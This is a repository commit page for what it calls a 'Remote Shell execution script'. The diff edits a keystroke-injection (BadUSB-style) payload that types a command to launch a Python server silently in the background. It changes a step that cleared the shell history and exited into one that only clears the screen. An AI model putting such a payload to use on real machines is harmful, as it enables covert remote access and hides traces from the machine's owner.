Updated Remote Shell execution script

This commit is contained in:
Narstybits
2023-05-29 19:19:21 -05:00
parent c1464c9c9d
commit 4c7cb6de93
+1 -1
View File
@@ -45,7 +45,7 @@ DELAY 500
STRING nohup python3 server.py > /dev/null 2>&1 &
ENTER
DELAY 500
STRING history -c && exit
STRING clear
ENTER